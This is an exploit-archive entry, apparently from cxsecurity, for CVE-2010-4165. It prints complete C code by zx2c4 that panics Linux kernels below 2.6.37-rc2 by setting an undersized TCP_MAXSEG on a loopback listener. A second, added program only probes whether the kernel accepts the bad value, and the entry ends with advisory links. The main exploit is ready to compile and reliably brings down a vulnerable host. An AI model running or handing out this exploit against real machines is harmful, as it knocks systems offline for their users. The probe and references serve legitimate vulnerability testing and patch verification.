Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS

2011.03.11
Credit: zx2c4
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-189


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

/*
 * TCP_MAXSEG Kernel Panic DoS for Linux < 2.6.37-rc2
 * by zx2c4
 *
 * This exploit triggers CVE-2010-4165, a divide by zero
 * error in net/ipv4/tcp.c. Because this is on the softirq
 * path, the kernel oopses and then completely dies with
 * no chance of recovery. It has been very reliable as a
 * DoS, but is not useful for triggering other bugs.
 *
 * -zx2c4, 28-2-2011
 */
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/tcp.h>

int main(void)
{
    struct sockaddr_in laddr;

    /* Listener address on loopback: the connect() below is then handled entirely by the local stack. */
    memset(&laddr, 0, sizeof(laddr));
    laddr.sin_family = AF_INET;
    laddr.sin_addr.s_addr = inet_addr("127.0.0.1");
    laddr.sin_port = htons(31337);

    int listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (listener < 0) {
        printf("[-] Could not open listener.\n");
        return -1;
    }

    /* The trigger: an MSS of only 12 bytes, which a vulnerable kernel accepts on the listening socket. */
    int val = 12;
    if (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) < 0) {
        printf("[-] Could not set sockopt.\n");
        return -1;
    }

    if (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {
        printf("[-] Could not bind to address.\n");
        return -1;
    }
    if (listen(listener, 1) < 0) {
        printf("[-] Could not listen.\n");
        return -1;
    }

    /* A second socket sends the SYN; the listener's SYN-ACK processing runs in softirq context
     * with the undersized MSS, which is where the vulnerable kernel divides by zero. */
    int hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (hello < 0) {
        printf("[-] Could not open connector.\n");
        return -1;
    }
    if (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {
        printf("[-] Could not connect to listener.\n");
        return -1;
    }

    /* Reaching this point means the kernel survived, i.e. it is not vulnerable. */
    printf("[-] Connection did not trigger oops.\n");
    return 0;
}
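A non-destructive check for the same issue, added here as an example and not part of zx2c4's exploit or of the kernel sources. It only calls setsockopt() on an unconnected socket and never listens or connects, so it cannot crash the host. It assumes, per the fix commit referenced below, that a patched kernel rejects TCP_MAXSEG values below TCP_MIN_MSS (88) with EINVAL, and that the exploit's value of 12 is chosen because it equals the 12-byte aligned TCP timestamp option (TCPOLEN_TSTAMP_ALIGNED) the kernel subtracts from the MSS before sizing the window, leaving a divisor of zero. The constants TIMESTAMP_OPT_LEN and PATCHED_MIN_MSS, the enum and the two function names are this example's own.

```c
/*
 * Added example (not zx2c4's exploit code): probe whether the running
 * kernel still accepts an absurdly small TCP_MAXSEG, and show why the
 * exploit picks 12. Assumptions: a patched kernel returns EINVAL for
 * values below TCP_MIN_MSS (88); with timestamps enabled the kernel
 * subtracts the 12-byte aligned timestamp option from the MSS before
 * computing the initial window.
 */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>

#define TIMESTAMP_OPT_LEN 12   /* TCPOLEN_TSTAMP_ALIGNED in the kernel (assumed) */
#define PATCHED_MIN_MSS   88   /* TCP_MIN_MSS, the post-fix lower bound (assumed) */

enum maxseg_result {
    MAXSEG_UNKNOWN  = -1,  /* socket()/setsockopt() failed for an unrelated reason */
    MAXSEG_ACCEPTED =  0,  /* kernel stored the value */
    MAXSEG_REJECTED =  1   /* kernel returned EINVAL */
};

/* MSS left over for window sizing once the aligned timestamp option is
 * removed from the user-supplied value. A result of 0 is the divisor
 * the exploit aims for. */
int effective_synack_mss(int user_mss, int timestamps_enabled)
{
    return timestamps_enabled ? user_mss - TIMESTAMP_OPT_LEN : user_mss;
}

/* Set TCP_MAXSEG on a fresh, unconnected socket and classify the result.
 * Nothing is bound, listened on or connected, so no SYN is ever processed. */
enum maxseg_result tcp_maxseg_probe(int val)
{
    int fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (fd < 0)
        return MAXSEG_UNKNOWN;

    int rc = setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val));
    int saved_errno = errno;
    close(fd);

    if (rc == 0)
        return MAXSEG_ACCEPTED;
    return (saved_errno == EINVAL) ? MAXSEG_REJECTED : MAXSEG_UNKNOWN;
}

int main(void)
{
    /* 12 is the exploit's value; 87/88 bracket the patched minimum. */
    int probes[] = { 12, PATCHED_MIN_MSS - 1, PATCHED_MIN_MSS };
    static const char *names[] = { "unknown", "accepted", "rejected (EINVAL)" };

    for (unsigned i = 0; i < sizeof(probes) / sizeof(probes[0]); i++) {
        int val = probes[i];
        enum maxseg_result r = tcp_maxseg_probe(val);
        printf("TCP_MAXSEG=%d: %s; effective SYN-ACK MSS with timestamps = %d\n",
               val, names[r + 1], effective_synack_mss(val, 1));
    }

    if (tcp_maxseg_probe(12) == MAXSEG_ACCEPTED)
        printf("[!] kernel accepts TCP_MAXSEG=12: a listener with this value would "
               "hand the SYN-ACK path a zero MSS (CVE-2010-4165 class)\n");
    else if (tcp_maxseg_probe(12) == MAXSEG_REJECTED)
        printf("[+] kernel rejects TCP_MAXSEG=12 with EINVAL: minimum-MSS check present\n");
    else
        printf("[?] could not probe (no socket access?)\n");
    return 0;
}
```

On a kernel carrying the fix the first two probes report EINVAL and only 88 is accepted; a kernel that accepts 12 is the one zx2c4's listener would crash, because 12 minus the timestamp option is exactly zero.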

References:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=7a1abd08d52fdeddb3e9a5a33f2f15cc6a5674d2
https://bugzilla.redhat.com/show_bug.cgi?id=652508
http://www.vupen.com/english/advisories/2011/0298
http://www.vupen.com/english/advisories/2011/0124
http://www.vupen.com/english/advisories/2011/0012
http://www.spinics.net/lists/netdev/msg146495.html
http://www.spinics.net/lists/netdev/msg146405.html
http://www.securityfocus.com/bid/44830
http://www.osvdb.org/69241
http://www.openwall.com/lists/oss-security/2010/11/12/4
http://www.openwall.com/lists/oss-security/2010/11/12/1
http://www.mandriva.com/security/advisories?name=MDVSA-2011:029
http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.37-rc2
http://secunia.com/advisories/42932
http://secunia.com/advisories/42801
http://secunia.com/advisories/42778
http://lists.opensuse.org/opensuse-security-announce/2011-02/msg00000.html
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00004.html
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00001.html
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00000.html


Copyright 2017, cxsecurity.com